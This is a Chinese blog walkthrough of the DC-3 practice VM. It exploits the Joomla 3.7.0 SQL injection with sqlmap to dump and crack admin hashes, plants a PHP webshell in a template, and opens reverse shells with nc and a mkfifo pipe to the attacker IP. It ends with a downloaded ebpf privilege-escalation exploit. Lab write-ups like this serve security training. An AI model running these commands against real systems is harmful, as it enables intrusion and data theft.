DC3靶机练习


实验环境:DC-3靶机,kali攻击机,net模式下进行实验

靶机:
链接:https://pan.baidu.com/s/1naWHuZDDwWOI2zqO6vG6OA 提取码:rkzw

1、信息收集

在这里插入图片描述
查看虚拟机的MAC地址

在攻击机下扫描C网段

nmap -sP 192.168.246.0/24 -oN namp.sP

在这里插入图片描述
得到目标主机的ip地址后,继续扫描开靶机开放的端口

nmap -A 192.168.246.141-p 1-65535 -oN namp.A

在这里插入图片描述
开放了80端口,可以去访问相关网页

可以扫描网站目录,但是毫无收获

2、网站指纹识别

使用whatweb

whatweb http://192.168.246.141

在这里插入图片描述
发现该网站使用的CMS是Joomla

使用joomscan进行扫描(需要自己安装)
工具安装:

git clone https://github.com/rezasp/joomscan.git
cd joomscan
perl joomscan.pl
参考连接:http://www.52bug.cn/hacktool/5336.html

perl joomscan.pl --url 192.168.246.141

在这里插入图片描述

后台登录网址:http://192.168.246.141/administrator/

3、然后根据版本信息查询漏洞里用模块

利用searchsploit joomla 3.7.0

发现了一个sql注入点
在这里插入图片描述
然后利用该注入点进行漏洞利用
在这里插入图片描述
直接有sqlmap命令,所以只需要更改地址然后执行命令
在这里插入图片描述
列出来mysql数据库中所有数据库的名字

这就证明sql注入漏洞存在

4、现在需要获取后台管理员的账户与密码

所以需要知道存在于哪一个数据库当中,所以继续利用sqlmap进行测试,只需要更改参数即可
获取当前数据库的名字

sqlmap -u “http://192.168.246.141/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml”
–risk=3 --level=5 --random-agent --current-db -p list[fullordering]

在这里插入图片描述

当前数据库的名字为joomladb

获取数据库中的表信息

sqlmap -u
“http://192.168.246.141/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml”
–risk=3 --level=5 --random-agent -D “joomladb” --tables -p list[fullordering]

共有76张表,其中存放用户信息的表在#__user表中
在这里插入图片描述

获取表中的字段信息

sqlmap -u
“http://192.168.246.141/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml”
–risk=3 --level=5 --random-agent -D “joomladb” -T “#__users” --columns -p list[fullordering]

在这里插入图片描述
获取字段相关内容

sqlmap -u
“http://192.168.246.141/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml”
–risk=3 --level=5 --random-agent -D “joomladb” -T “#__users” -C “name,password” --dump -p list[fullordering]

在这里插入图片描述

得到了用户与加密的密码,现在需要对其进行解密

使用john工具对哈希值进行爆破
在这里插入图片描述
成功得到密码为snoopy

输入用户名与密码登录网站后台

5、随便浏览网站后台,发现一个模板目录

在这里插入图片描述
进去后发现有php文件,并且可以编辑文件
在这里插入图片描述

找到文件目录,上传木马

寻找到之前扫描到的目录

http://192.168.246.141/administrator/templates

打开但是没有beez3这个目录,根据对Joomla的了解,目录一般就放在根目录的templates目录下

查看有没有beez3这个目录

打开网址http://192.168.246.141/templates/beez3/

发现网页空白,表示网页存在
在这里插入图片描述

发现了modules.php文件,然后也发现了网站了后台存在modules.php文件
在这里插入图片描述
在这里插入图片描述
创建以后存在该目录,创建一句话木马
在这里插入图片描述
保存成功
在这里插入图片描述
访问这个文件表示成功
在这里插入图片描述
使用蚁剑进行连接
在这里插入图片描述
打开虚拟终端
在这里插入图片描述
6、需要进行提权
反弹shell
在kali主机上设置监听
nc -lvvp 2333
在虚拟终端上执行
nc -e /bin/bash 192.168.246.130 2333

-e 参数不可用

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.246.130
2333 >/tmp/f

反弹成功
在这里插入图片描述

7、提权

靶机当前的系统为ubuntu 16.04
searchsploit ubuntu 16.04
在这里插入图片描述

cp /usr/share/exploitdb/exploits/linux/local/39772.txt

ubuntu1604_shell.txt cat ubuntu1604_shell.txt

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

在反弹shell 的界面测试,发现访问失败,原因是我们的电脑无法访问国外的服务器

解决方法:我们先将39772.zip 文件下载至本地,本地搭建服务器,将文件上传至服务器,

我们直接访问本地服务器下载文件即可

将下载好的安装包放到/var/www/html目录下,然后开启apache服务

在shell中下载文件wget http://192.168.246.130/30772.zip
在这里插入图片描述

解压
unzip 39772.zip

cd 39772
在这里插入图片描述

tar -xvf exploit.tar

cd ebpf_mapfd_doubleput_exploit
在这里插入图片描述

./compile.sh

./doubleput
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值